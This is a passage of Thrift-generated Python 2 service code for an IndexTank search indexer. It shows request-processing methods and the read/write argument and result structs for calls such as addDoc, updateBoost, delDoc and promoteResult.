iprot.readMessageEnd()
result = get_stats_result()
try:
result.success = self._handler.get_stats()
except IndextankException, ite:
result.ite = ite
oprot.writeMessageBegin("get_stats", TMessageType.REPLY, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_force_gc(self, seqid, iprot, oprot):
args = force_gc_args()
args.read(iprot)
iprot.readMessageEnd()
result = force_gc_result()
try:
self._handler.force_gc()
except IndextankException, ite:
result.ite = ite
oprot.writeMessageBegin("force_gc", TMessageType.REPLY, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_getStatus(self, seqid, iprot, oprot):
args = getStatus_args()
args.read(iprot)
iprot.readMessageEnd()
result = getStatus_result()
result.success = self._handler.getStatus()
oprot.writeMessageBegin("getStatus", TMessageType.REPLY, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_ping(self, seqid, iprot, oprot):
args = ping_args()
args.read(iprot)
iprot.readMessageEnd()
result = ping_result()
self._handler.ping()
oprot.writeMessageBegin("ping", TMessageType.REPLY, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_startFullRecovery(self, seqid, iprot, oprot):
args = startFullRecovery_args()
args.read(iprot)
iprot.readMessageEnd()
result = startFullRecovery_result()
self._handler.startFullRecovery()
oprot.writeMessageBegin("startFullRecovery", TMessageType.REPLY, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
# HELPER FUNCTIONS AND STRUCTURES
class addDoc_args:
  """Thrift-generated argument struct for Indexer.addDoc.

  Attributes:
   - docid
   - doc
   - timestamp_boost
   - boosts
  """

  # Positional field specs consumed by the accelerated (C) protocol codec.
  thrift_spec = (
    None, # 0
    (1, TType.STRING, 'docid', None, None, ), # 1
    (2, TType.STRUCT, 'doc', (Document, Document.thrift_spec), None, ), # 2
    (3, TType.I32, 'timestamp_boost', None, None, ), # 3
    (4, TType.MAP, 'boosts', (TType.I32,None,TType.DOUBLE,None), None, ), # 4
  )

  def __init__(self, docid=None, doc=None, timestamp_boost=None, boosts=None,):
    self.docid = docid
    self.doc = doc
    self.timestamp_boost = timestamp_boost
    self.boosts = boosts

  def read(self, iprot):
    # Fast path: decode via the C extension when it and the spec are present.
    if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
      fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
      return
    # Slow path: field-by-field decode; fields of unexpected id/type are skipped.
    iprot.readStructBegin()
    while True:
      (fname, ftype, fid) = iprot.readFieldBegin()
      if ftype == TType.STOP:
        break
      if fid == 1:
        if ftype == TType.STRING:
          self.docid = iprot.readString();
        else:
          iprot.skip(ftype)
      elif fid == 2:
        if ftype == TType.STRUCT:
          self.doc = Document()
          self.doc.read(iprot)
        else:
          iprot.skip(ftype)
      elif fid == 3:
        if ftype == TType.I32:
          self.timestamp_boost = iprot.readI32();
        else:
          iprot.skip(ftype)
      elif fid == 4:
        if ftype == TType.MAP:
          self.boosts = {}
          (_ktype207, _vtype208, _size206 ) = iprot.readMapBegin()
          for _i210 in xrange(_size206):
            _key211 = iprot.readI32();
            _val212 = iprot.readDouble();
            self.boosts[_key211] = _val212
          iprot.readMapEnd()
        else:
          iprot.skip(ftype)
      else:
        iprot.skip(ftype)
      iprot.readFieldEnd()
    iprot.readStructEnd()

  def write(self, oprot):
    # Fast path via the C extension when available.
    if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
      oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
      return
    # Unset (None) fields are omitted from the wire encoding.
    oprot.writeStructBegin('addDoc_args')
    if self.docid != None:
      oprot.writeFieldBegin('docid', TType.STRING, 1)
      oprot.writeString(self.docid)
      oprot.writeFieldEnd()
    if self.doc != None:
      oprot.writeFieldBegin('doc', TType.STRUCT, 2)
      self.doc.write(oprot)
      oprot.writeFieldEnd()
    if self.timestamp_boost != None:
      oprot.writeFieldBegin('timestamp_boost', TType.I32, 3)
      oprot.writeI32(self.timestamp_boost)
      oprot.writeFieldEnd()
    if self.boosts != None:
      oprot.writeFieldBegin('boosts', TType.MAP, 4)
      oprot.writeMapBegin(TType.I32, TType.DOUBLE, len(self.boosts))
      for kiter213,viter214 in self.boosts.items():
        oprot.writeI32(kiter213)
        oprot.writeDouble(viter214)
      oprot.writeMapEnd()
      oprot.writeFieldEnd()
    oprot.writeFieldStop()
    oprot.writeStructEnd()

  def validate(self):
    return

  def __repr__(self):
    L = ['%s=%r' % (key, value)
      for key, value in self.__dict__.iteritems()]
    return '%s(%s)' % (self.__class__.__name__, ', '.join(L))

  def __eq__(self, other):
    return isinstance(other, self.__class__) and self.__dict__ == other.__dict__

  def __ne__(self, other):
    return not (self == other)
class addDoc_result:
  """Thrift-generated result struct for Indexer.addDoc.

  addDoc returns void, so the only field is the declared service exception.

  Attributes:
   - ite
  """

  thrift_spec = (
    None, # 0
    (1, TType.STRUCT, 'ite', (IndextankException, IndextankException.thrift_spec), None, ), # 1
  )

  def __init__(self, ite=None,):
    self.ite = ite

  def read(self, iprot):
    # Fast path via the C extension when available.
    if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
      fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
      return
    iprot.readStructBegin()
    while True:
      (fname, ftype, fid) = iprot.readFieldBegin()
      if ftype == TType.STOP:
        break
      if fid == 1:
        if ftype == TType.STRUCT:
          self.ite = IndextankException()
          self.ite.read(iprot)
        else:
          iprot.skip(ftype)
      else:
        iprot.skip(ftype)
      iprot.readFieldEnd()
    iprot.readStructEnd()

  def write(self, oprot):
    if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
      oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
      return
    oprot.writeStructBegin('addDoc_result')
    if self.ite != None:
      oprot.writeFieldBegin('ite', TType.STRUCT, 1)
      self.ite.write(oprot)
      oprot.writeFieldEnd()
    oprot.writeFieldStop()
    oprot.writeStructEnd()

  def validate(self):
    return

  def __repr__(self):
    L = ['%s=%r' % (key, value)
      for key, value in self.__dict__.iteritems()]
    return '%s(%s)' % (self.__class__.__name__, ', '.join(L))

  def __eq__(self, other):
    return isinstance(other, self.__class__) and self.__dict__ == other.__dict__

  def __ne__(self, other):
    return not (self == other)
class updateTimestampBoost_args:
  """Thrift-generated argument struct for Indexer.updateTimestampBoost.

  Attributes:
   - docid
   - timestamp_boost
  """

  thrift_spec = (
    None, # 0
    (1, TType.STRING, 'docid', None, None, ), # 1
    (2, TType.I32, 'timestamp_boost', None, None, ), # 2
  )

  def __init__(self, docid=None, timestamp_boost=None,):
    self.docid = docid
    self.timestamp_boost = timestamp_boost

  def read(self, iprot):
    # Fast path via the C extension when available.
    if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
      fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
      return
    # Slow path: field-by-field decode; unknown fields are skipped.
    iprot.readStructBegin()
    while True:
      (fname, ftype, fid) = iprot.readFieldBegin()
      if ftype == TType.STOP:
        break
      if fid == 1:
        if ftype == TType.STRING:
          self.docid = iprot.readString();
        else:
          iprot.skip(ftype)
      elif fid == 2:
        if ftype == TType.I32:
          self.timestamp_boost = iprot.readI32();
        else:
          iprot.skip(ftype)
      else:
        iprot.skip(ftype)
      iprot.readFieldEnd()
    iprot.readStructEnd()

  def write(self, oprot):
    if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
      oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
      return
    # Unset (None) fields are omitted from the wire encoding.
    oprot.writeStructBegin('updateTimestampBoost_args')
    if self.docid != None:
      oprot.writeFieldBegin('docid', TType.STRING, 1)
      oprot.writeString(self.docid)
      oprot.writeFieldEnd()
    if self.timestamp_boost != None:
      oprot.writeFieldBegin('timestamp_boost', TType.I32, 2)
      oprot.writeI32(self.timestamp_boost)
      oprot.writeFieldEnd()
    oprot.writeFieldStop()
    oprot.writeStructEnd()

  def validate(self):
    return

  def __repr__(self):
    L = ['%s=%r' % (key, value)
      for key, value in self.__dict__.iteritems()]
    return '%s(%s)' % (self.__class__.__name__, ', '.join(L))

  def __eq__(self, other):
    return isinstance(other, self.__class__) and self.__dict__ == other.__dict__

  def __ne__(self, other):
    return not (self == other)
class updateTimestampBoost_result:
  """
  Thrift result struct for the updateTimestampBoost call.

  No 'success' field is declared; only a server-side exception may come back.

  Attributes:
   - ite: IndextankException raised by the server, or None on success
  """
  thrift_spec = (
    None, # 0
    (1, TType.STRUCT, 'ite', (IndextankException, IndextankException.thrift_spec), None, ), # 1
  )
  def __init__(self, ite=None,):
    self.ite = ite
  def read(self, iprot):
    """Deserialize this struct from the given input protocol."""
    # Fast path: C-accelerated (fastbinary) decoder when available.
    if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
      fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
      return
    iprot.readStructBegin()
    while True:
      (fname, ftype, fid) = iprot.readFieldBegin()
      if ftype == TType.STOP:
        break
      if fid == 1:
        if ftype == TType.STRUCT:
          self.ite = IndextankException()
          self.ite.read(iprot)
        else:
          iprot.skip(ftype)
      else:
        # Unrecognized field id: skip its value.
        iprot.skip(ftype)
      iprot.readFieldEnd()
    iprot.readStructEnd()
  def write(self, oprot):
    """Serialize this struct to the given output protocol."""
    # Fast path: C-accelerated (fastbinary) encoder when available.
    if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
      oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
      return
    oprot.writeStructBegin('updateTimestampBoost_result')
    if self.ite != None:
      oprot.writeFieldBegin('ite', TType.STRUCT, 1)
      self.ite.write(oprot)
      oprot.writeFieldEnd()
    oprot.writeFieldStop()
    oprot.writeStructEnd()
  def validate(self):
    return
  def __repr__(self):
    # NOTE: iteritems() is Python 2 only.
    L = ['%s=%r' % (key, value)
      for key, value in self.__dict__.iteritems()]
    return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
  def __eq__(self, other):
    return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
  def __ne__(self, other):
    return not (self == other)
class updateBoost_args:
  """
  Thrift argument struct for the updateBoost call.

  Attributes:
   - docid: document identifier (string, field id 1)
   - boosts: map of boost index (i32) -> boost value (double), field id 2
  """
  thrift_spec = (
    None, # 0
    (1, TType.STRING, 'docid', None, None, ), # 1
    (2, TType.MAP, 'boosts', (TType.I32,None,TType.DOUBLE,None), None, ), # 2
  )
  def __init__(self, docid=None, boosts=None,):
    self.docid = docid
    self.boosts = boosts
  def read(self, iprot):
    """Deserialize this struct from the given input protocol."""
    # Fast path: C-accelerated (fastbinary) decoder when available.
    if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
      fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
      return
    iprot.readStructBegin()
    while True:
      (fname, ftype, fid) = iprot.readFieldBegin()
      if ftype == TType.STOP:
        break
      if fid == 1:
        if ftype == TType.STRING:
          self.docid = iprot.readString();
        else:
          iprot.skip(ftype)
      elif fid == 2:
        if ftype == TType.MAP:
          # Decode the i32 -> double boosts map element by element.
          self.boosts = {}
          (_ktype216, _vtype217, _size215 ) = iprot.readMapBegin()
          for _i219 in xrange(_size215):
            _key220 = iprot.readI32();
            _val221 = iprot.readDouble();
            self.boosts[_key220] = _val221
          iprot.readMapEnd()
        else:
          iprot.skip(ftype)
      else:
        # Unrecognized field id: skip its value.
        iprot.skip(ftype)
      iprot.readFieldEnd()
    iprot.readStructEnd()
  def write(self, oprot):
    """Serialize this struct to the given output protocol."""
    # Fast path: C-accelerated (fastbinary) encoder when available.
    if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
      oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
      return
    oprot.writeStructBegin('updateBoost_args')
    if self.docid != None:
      oprot.writeFieldBegin('docid', TType.STRING, 1)
      oprot.writeString(self.docid)
      oprot.writeFieldEnd()
    if self.boosts != None:
      oprot.writeFieldBegin('boosts', TType.MAP, 2)
      oprot.writeMapBegin(TType.I32, TType.DOUBLE, len(self.boosts))
      for kiter222,viter223 in self.boosts.items():
        oprot.writeI32(kiter222)
        oprot.writeDouble(viter223)
      oprot.writeMapEnd()
      oprot.writeFieldEnd()
    oprot.writeFieldStop()
    oprot.writeStructEnd()
  def validate(self):
    return
  def __repr__(self):
    # NOTE: iteritems() is Python 2 only.
    L = ['%s=%r' % (key, value)
      for key, value in self.__dict__.iteritems()]
    return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
  def __eq__(self, other):
    return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
  def __ne__(self, other):
    return not (self == other)
class updateBoost_result:
  """
  Thrift result struct for the updateBoost call.

  No 'success' field is declared; only a server-side exception may come back.

  Attributes:
   - ite: IndextankException raised by the server, or None on success
  """
  thrift_spec = (
    None, # 0
    (1, TType.STRUCT, 'ite', (IndextankException, IndextankException.thrift_spec), None, ), # 1
  )
  def __init__(self, ite=None,):
    self.ite = ite
  def read(self, iprot):
    """Deserialize this struct from the given input protocol."""
    # Fast path: C-accelerated (fastbinary) decoder when available.
    if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
      fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
      return
    iprot.readStructBegin()
    while True:
      (fname, ftype, fid) = iprot.readFieldBegin()
      if ftype == TType.STOP:
        break
      if fid == 1:
        if ftype == TType.STRUCT:
          self.ite = IndextankException()
          self.ite.read(iprot)
        else:
          iprot.skip(ftype)
      else:
        # Unrecognized field id: skip its value.
        iprot.skip(ftype)
      iprot.readFieldEnd()
    iprot.readStructEnd()
  def write(self, oprot):
    """Serialize this struct to the given output protocol."""
    # Fast path: C-accelerated (fastbinary) encoder when available.
    if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
      oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
      return
    oprot.writeStructBegin('updateBoost_result')
    if self.ite != None:
      oprot.writeFieldBegin('ite', TType.STRUCT, 1)
      self.ite.write(oprot)
      oprot.writeFieldEnd()
    oprot.writeFieldStop()
    oprot.writeStructEnd()
  def validate(self):
    return
  def __repr__(self):
    # NOTE: iteritems() is Python 2 only.
    L = ['%s=%r' % (key, value)
      for key, value in self.__dict__.iteritems()]
    return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
  def __eq__(self, other):
    return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
  def __ne__(self, other):
    return not (self == other)
class updateCategories_args:
  """
  Thrift argument struct for the updateCategories call.

  Attributes:
   - docid: document identifier (string, field id 1)
   - categories: map of category name (string) -> value (string), field id 2
  """
  thrift_spec = (
    None, # 0
    (1, TType.STRING, 'docid', None, None, ), # 1
    (2, TType.MAP, 'categories', (TType.STRING,None,TType.STRING,None), None, ), # 2
  )
  def __init__(self, docid=None, categories=None,):
    self.docid = docid
    self.categories = categories
  def read(self, iprot):
    """Deserialize this struct from the given input protocol."""
    # Fast path: C-accelerated (fastbinary) decoder when available.
    if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
      fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
      return
    iprot.readStructBegin()
    while True:
      (fname, ftype, fid) = iprot.readFieldBegin()
      if ftype == TType.STOP:
        break
      if fid == 1:
        if ftype == TType.STRING:
          self.docid = iprot.readString();
        else:
          iprot.skip(ftype)
      elif fid == 2:
        if ftype == TType.MAP:
          # Decode the string -> string categories map element by element.
          self.categories = {}
          (_ktype225, _vtype226, _size224 ) = iprot.readMapBegin()
          for _i228 in xrange(_size224):
            _key229 = iprot.readString();
            _val230 = iprot.readString();
            self.categories[_key229] = _val230
          iprot.readMapEnd()
        else:
          iprot.skip(ftype)
      else:
        # Unrecognized field id: skip its value.
        iprot.skip(ftype)
      iprot.readFieldEnd()
    iprot.readStructEnd()
  def write(self, oprot):
    """Serialize this struct to the given output protocol."""
    # Fast path: C-accelerated (fastbinary) encoder when available.
    if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
      oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
      return
    oprot.writeStructBegin('updateCategories_args')
    if self.docid != None:
      oprot.writeFieldBegin('docid', TType.STRING, 1)
      oprot.writeString(self.docid)
      oprot.writeFieldEnd()
    if self.categories != None:
      oprot.writeFieldBegin('categories', TType.MAP, 2)
      oprot.writeMapBegin(TType.STRING, TType.STRING, len(self.categories))
      for kiter231,viter232 in self.categories.items():
        oprot.writeString(kiter231)
        oprot.writeString(viter232)
      oprot.writeMapEnd()
      oprot.writeFieldEnd()
    oprot.writeFieldStop()
    oprot.writeStructEnd()
  def validate(self):
    return
  def __repr__(self):
    # NOTE: iteritems() is Python 2 only.
    L = ['%s=%r' % (key, value)
      for key, value in self.__dict__.iteritems()]
    return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
  def __eq__(self, other):
    return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
  def __ne__(self, other):
    return not (self == other)
class updateCategories_result:
  """
  Thrift result struct for the updateCategories call.

  No 'success' field is declared; only a server-side exception may come back.

  Attributes:
   - ite: IndextankException raised by the server, or None on success
  """
  thrift_spec = (
    None, # 0
    (1, TType.STRUCT, 'ite', (IndextankException, IndextankException.thrift_spec), None, ), # 1
  )
  def __init__(self, ite=None,):
    self.ite = ite
  def read(self, iprot):
    """Deserialize this struct from the given input protocol."""
    # Fast path: C-accelerated (fastbinary) decoder when available.
    if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
      fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
      return
    iprot.readStructBegin()
    while True:
      (fname, ftype, fid) = iprot.readFieldBegin()
      if ftype == TType.STOP:
        break
      if fid == 1:
        if ftype == TType.STRUCT:
          self.ite = IndextankException()
          self.ite.read(iprot)
        else:
          iprot.skip(ftype)
      else:
        # Unrecognized field id: skip its value.
        iprot.skip(ftype)
      iprot.readFieldEnd()
    iprot.readStructEnd()
  def write(self, oprot):
    """Serialize this struct to the given output protocol."""
    # Fast path: C-accelerated (fastbinary) encoder when available.
    if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
      oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
      return
    oprot.writeStructBegin('updateCategories_result')
    if self.ite != None:
      oprot.writeFieldBegin('ite', TType.STRUCT, 1)
      self.ite.write(oprot)
      oprot.writeFieldEnd()
    oprot.writeFieldStop()
    oprot.writeStructEnd()
  def validate(self):
    return
  def __repr__(self):
    # NOTE: iteritems() is Python 2 only.
    L = ['%s=%r' % (key, value)
      for key, value in self.__dict__.iteritems()]
    return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
  def __eq__(self, other):
    return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
  def __ne__(self, other):
    return not (self == other)
class delDoc_args:
  """
  Thrift argument struct for the delDoc call.

  Attributes:
   - docid: identifier of the document to delete (string, field id 1)
  """
  thrift_spec = (
    None, # 0
    (1, TType.STRING, 'docid', None, None, ), # 1
  )
  def __init__(self, docid=None,):
    self.docid = docid
  def read(self, iprot):
    """Deserialize this struct from the given input protocol."""
    # Fast path: C-accelerated (fastbinary) decoder when available.
    if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
      fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
      return
    iprot.readStructBegin()
    while True:
      (fname, ftype, fid) = iprot.readFieldBegin()
      if ftype == TType.STOP:
        break
      if fid == 1:
        if ftype == TType.STRING:
          self.docid = iprot.readString();
        else:
          iprot.skip(ftype)
      else:
        # Unrecognized field id: skip its value.
        iprot.skip(ftype)
      iprot.readFieldEnd()
    iprot.readStructEnd()
  def write(self, oprot):
    """Serialize this struct to the given output protocol."""
    # Fast path: C-accelerated (fastbinary) encoder when available.
    if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
      oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
      return
    oprot.writeStructBegin('delDoc_args')
    if self.docid != None:
      oprot.writeFieldBegin('docid', TType.STRING, 1)
      oprot.writeString(self.docid)
      oprot.writeFieldEnd()
    oprot.writeFieldStop()
    oprot.writeStructEnd()
  def validate(self):
    return
  def __repr__(self):
    # NOTE: iteritems() is Python 2 only.
    L = ['%s=%r' % (key, value)
      for key, value in self.__dict__.iteritems()]
    return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
  def __eq__(self, other):
    return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
  def __ne__(self, other):
    return not (self == other)
class delDoc_result:
  """
  Thrift result struct for the delDoc call.

  No 'success' field is declared; only a server-side exception may come back.

  Attributes:
   - ite: IndextankException raised by the server, or None on success
  """
  thrift_spec = (
    None, # 0
    (1, TType.STRUCT, 'ite', (IndextankException, IndextankException.thrift_spec), None, ), # 1
  )
  def __init__(self, ite=None,):
    self.ite = ite
  def read(self, iprot):
    """Deserialize this struct from the given input protocol."""
    # Fast path: C-accelerated (fastbinary) decoder when available.
    if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
      fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
      return
    iprot.readStructBegin()
    while True:
      (fname, ftype, fid) = iprot.readFieldBegin()
      if ftype == TType.STOP:
        break
      if fid == 1:
        if ftype == TType.STRUCT:
          self.ite = IndextankException()
          self.ite.read(iprot)
        else:
          iprot.skip(ftype)
      else:
        # Unrecognized field id: skip its value.
        iprot.skip(ftype)
      iprot.readFieldEnd()
    iprot.readStructEnd()
  def write(self, oprot):
    """Serialize this struct to the given output protocol."""
    # Fast path: C-accelerated (fastbinary) encoder when available.
    if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
      oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
      return
    oprot.writeStructBegin('delDoc_result')
    if self.ite != None:
      oprot.writeFieldBegin('ite', TType.STRUCT, 1)
      self.ite.write(oprot)
      oprot.writeFieldEnd()
    oprot.writeFieldStop()
    oprot.writeStructEnd()
  def validate(self):
    return
  def __repr__(self):
    # NOTE: iteritems() is Python 2 only.
    L = ['%s=%r' % (key, value)
      for key, value in self.__dict__.iteritems()]
    return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
  def __eq__(self, other):
    return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
  def __ne__(self, other):
    return not (self == other)
class promoteResult_args:
  """
  Thrift argument struct for the promoteResult call.

  Attributes:
   - docid: identifier of the document to promote (string, field id 1)
   - query: query for which the document is promoted (string, field id 2)
  """
  thrift_spec = (
    None, # 0
    (1, TType.STRING, 'docid', None, None, ), # 1
    (2, TType.STRING, 'query', None, None, ), # 2
  )
  def __init__(self, docid=None, query=None,):
    self.docid = docid
    self.query = query
  def read(self, iprot):
    """Deserialize this struct from the given input protocol."""
    # Fast path: C-accelerated (fastbinary) decoder when available.
    if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
      fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
      return
    iprot.readStructBegin()
    while True:
      (fname, ftype, fid) = iprot.readFieldBegin()
      if ftype == TType.STOP:
        break
      if fid == 1:
        if ftype == TType.STRING:
          self.docid = iprot.readString();
        else:
          iprot.skip(ftype)
      elif fid == 2:
        if ftype == TType.STRING:
          self.query = iprot.readString();
        else:
          iprot.skip(ftype)
      else:
        # Unrecognized field id: skip its value.
        iprot.skip(ftype)
      iprot.readFieldEnd()
    iprot.readStructEnd()
  def write(self, oprot):
    """Serialize this struct to the given output protocol."""
    # Fast path: C-accelerated (fastbinary) encoder when available.
    if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
      oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
      return
    oprot.writeStructBegin('promoteResult_args')
    if self.docid != None:
      oprot.writeFieldBegin('docid', TType.STRING, 1)
      oprot.writeString(self.docid)
      oprot.writeFieldEnd()
    if self.query != None:
      oprot.writeFieldBegin('query', TType.STRING, 2)
      oprot.writeString(self.query)
      oprot.writeFieldEnd()
    oprot.writeFieldStop()
    oprot.writeStructEnd()
  def validate(self):
    return
  def __repr__(self):
    # NOTE: iteritems() is Python 2 only.
    L = ['%s=%r' % (key, value)
      for key, value in self.__dict__.iteritems()]
    return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
  def __eq__(self, other):
    return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
  def __ne__(self, other):
    return not (self == other)
class promoteResult_result:
  """
  Thrift result struct for the promoteResult call.

  No 'success' field is declared; only a server-side exception may come back.

  Attributes:
   - ite: IndextankException raised by the server, or None on success
  """
  thrift_spec = (
    None, # 0
    (1, TType.STRUCT, 'ite', (IndextankException, IndextankException.thrift_spec), None, ), # 1
  )
  def __init__(self, ite=None,):
    self.ite = ite
  def read(self, iprot):
    """Deserialize this struct from the given input protocol."""
    # Fast path: C-accelerated (fastbinary) decoder when available.
    if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
      fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
      return
    iprot.readStructBegin()
    while True:
      (fname, ftype, fid) = iprot.readFieldBegin()
      if ftype == TType.STOP:
        break
      if fid == 1:
        if ftype == TType.STRUCT:
          self.ite = IndextankException()
          self.ite.read(iprot)
        else:
          iprot.skip(ftype)
      else:
        # Unrecognized field id: skip its value.
        iprot.skip(ftype)
      iprot.readFieldEnd()
    iprot.readStructEnd()
  def write(self, oprot):
    """Serialize this struct to the given output protocol."""
    # Fast path: C-accelerated (fastbinary) encoder when available.
    if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
      oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
      return
    oprot.writeStructBegin('promoteResult_result')
    if self.ite != None:
      oprot.writeFieldBegin('ite', TType.STRUCT, 1)
      self.ite.write(oprot)
      oprot.writeFieldEnd()
    oprot.writeFieldStop()
    oprot.writeStructEnd()
  def validate(self):
    return
  def __repr__(self):
    # NOTE: iteritems() is Python 2 only.
    L = ['%s=%r' % (key, value)
      for key, value in self.__dict__.iteritems()]
    return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
  def __eq__(self, other):
    return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
  def __ne__(self, other):
    return not (self == other)
class dump_args:
  """Thrift argument struct for the dump call. Declares no fields."""
  thrift_spec = (
  )
  def read(self, iprot):
    """Deserialize this struct from the given input protocol."""
    # Fast path: C-accelerated (fastbinary) decoder when available.
    if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
      fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
      return
    iprot.readStructBegin()
    while True:
      (fname, ftype, fid) = iprot.readFieldBegin()
      if ftype == TType.STOP:
        break
      else:
        # No fields are declared; skip anything encountered.
        iprot.skip(ftype)
      iprot.readFieldEnd()
    iprot.readStructEnd()
  def write(self, oprot):
    """Serialize this struct to the given output protocol."""
    # Fast path: C-accelerated (fastbinary) encoder when available.
    if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
      oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
      return
    oprot.writeStructBegin('dump_args')
    oprot.writeFieldStop()
    oprot.writeStructEnd()
  def validate(self):
    return
  def __repr__(self):
    # NOTE: iteritems() is Python 2 only.
    L = ['%s=%r' % (key, value)
      for key, value in self.__dict__.iteritems()]
    return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
  def __eq__(self, other):
    return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
  def __ne__(self, other):
    return not (self == other)
class dump_result:
  """
